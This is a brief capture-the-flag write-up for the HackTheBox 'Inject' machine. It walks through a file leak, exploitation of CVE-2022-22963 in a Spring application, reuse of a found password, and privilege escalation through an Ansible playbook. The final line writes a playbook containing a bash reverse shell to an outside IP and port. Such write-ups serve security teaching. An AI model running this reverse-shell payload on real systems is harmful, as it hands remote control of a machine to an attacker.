HacktheBox - Inject
Author: gotNothingHere
Initial Enumeration
Web
Leak on proc fd
Checking the Entrypoint file we see it is a SpringApplication
creds
xml
1 |
|
checking pom.xml we see it can be vurnable to CVE-2022-22963
After getting the shell we can su to phil using the password we had found in settings.xml
Privilege Escalation
After getting shell as phil we see we are part of staff group
in /opt/automations/tasks/
we find some ansible playbook
using gtfobins we can create a payload as
jboss-cli
1 | echo '[{hosts: localhost, tasks: [shell: /bin/bash -c "bash -i >& /dev/tcp/10.10.14.198/1337 0>&1"]}]' > playbook_2.yml |










